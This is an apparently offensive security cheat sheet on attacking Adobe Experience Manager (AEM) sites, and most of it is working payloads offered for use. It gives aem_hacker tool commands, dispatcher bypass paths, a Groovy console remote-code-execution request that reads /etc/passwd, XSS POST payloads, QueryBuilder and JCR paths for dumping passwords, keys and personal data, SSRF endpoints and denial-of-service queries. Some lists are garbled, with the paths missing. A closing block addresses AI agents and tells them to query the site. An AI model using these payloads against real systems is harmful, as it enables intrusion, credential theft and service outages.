> For the complete documentation index, see [llms.txt](https://sec88.0x88.online/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sec88.0x88.online/web-appsec/cms/aem-adobe-cms.md). # AEM \[Adobe CMS] #### video #### method * collect sub domain * use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem * Python3 ./aem\_hacker.py –u [https://example](https://example/) — host localhost * use ../fuzzing/service/aem.txt to fuzz on path #### aem tools * * ``` python3 aem_hacker.py -u --host yourvpshostname =>comman usagepython3 aem_discovery.py --file urls.txt --workers 150 =>discover urlpython3 aem_enum.py --url => automate usernames and secrets grabbingpython3 aem_ssrf2rce.py --url --fakaem yourvbspython3 aem_server.py ``` #### aem dispatcher bypasses * [ ] bypassing cve 2016-0957 ``` => blocked => allow => allow => allow => allow => allow => allow ``` * [ ] bypassing for interesting servlets ``` => blocked => block => block => allow => allow => allow => allow///etc.json instead of /etc.json///bin///quesrybuilder.json instead of /bin/quesrybuilder.json ``` * [ ] using ssrf ``` ssrf should allow to send GET request and see response- Opensocial proxy- ssrf in reportingservicesproxyservlet(cve-2018-12809) ``` * [ ] rce via exposed Groovy console ``` POST /bin/groovyconsole/post.servlet HTTP/1.1HOST:script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt ``` * [ ] xss ``` POST //////content/usergenerated/etc/commerce/smartlists/vv.jsonaa=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b ``` * [ ] xss ``` POST /content/usergenerated/etc/commerce/smartlists/xssaaa.html=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b ``` * [ ] xss ``` POST /content/usergenerated/etc/commerce/smartlists/xssedjcr:data=alert('xss+on+'%2b+document.domain+%2b+'\\nby+%400ang3el+\\ud83d\\ude00')%3b&jcr:mimeType=text/html ``` * [ ] secret from jcr ``` everything is stored in jcr repository :- secrets (password ,encryption key , tokens)- cinfiguration- pII- usernames** what to use **- DefaultGETServlet- QueryBUilderJsonServlet- QueryBuilderFeedServlet- GQLSearch Servlet- other** DefaultGETServlet **- Allows to get jsr node with its props- selectors - tidy - infinity - numeric value:-1,0,1...99999- formats - json - xml - res- / => jcr:root tidy => selector tidy 3 => selector depth json => output format- how to grap - get node names, start from jcr:root : - /.1.json - /.ext.json - /.childrenlist.json - or guess node names : - comman names /content, /home, /var, /etc - Dump props for each child node of jcr:root : - /etc.json or /etc.s.json or /etc.-1.json- what to grap - interesting nodes - /etc => may contain secrets (pass,enc,keys) - /apps/system/config => passwords - /apps//config => passwords - /var => may contain private pii - /home => password hashed ,pii - interesting props-contain aem usernames - jcr:createdBy - jcr:lastModifiedBy - cq:LastModifiedBy ``` * [ ] QueryBuild Servlets ``` - path - /bin/querybuilder.json - /bin/querybuilder.feed.servlet- examples of useful searches - type=nt:file&nodename=*.zip - path=/home&p.hits-full&p.limit=-1 - hasPermission=jcr:write&path=/content - hasPermission=jcr:addChild Nodes&path=/content - hasPermission=jcr:modify Properties&path=/content - p.hits-selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation-unequals&property.value=admin&type=nt%3abase&p.limit=1000 - path=/etc&path.flat=true&p.nodedepth=0 - path=/etc/replication/agents.author&p.hits-full&p.nodedepth=-1 ``` * [ ] exploit SSRF ``` ssrf via Opensocial proxy - /libs/opensocial/proxy?container=default&url=http://target - /libs/shindig/proxy?container=default&url=http://target ``` * [ ] ReportingServicesProxyServlet ``` SSRF via ReportingServicesProxyServlet (CVE-2018-12809)- /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a- /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a- /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret-zzzz&redirect_uri=xxxx&code=eSSRF via SiteCatalystServlet- /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet- /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json ``` * [ ] DOS ``` - /.ext.infinity.json- /.ext.infinity.json?tidy=true- /bin/querybuilder.json?type=nt:base&p.limit=-1- /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=- /content.assetsearch.json?query=*&start=0&limit=10&random=123- /..assetsearch.json?query=*&start=0&limit=10&random=123- /system/bgservlets/test.json?cycles-999999&interval=0&flushEvery=111111111 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sec88.0x88.online/web-appsec/cms/aem-adobe-cms.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.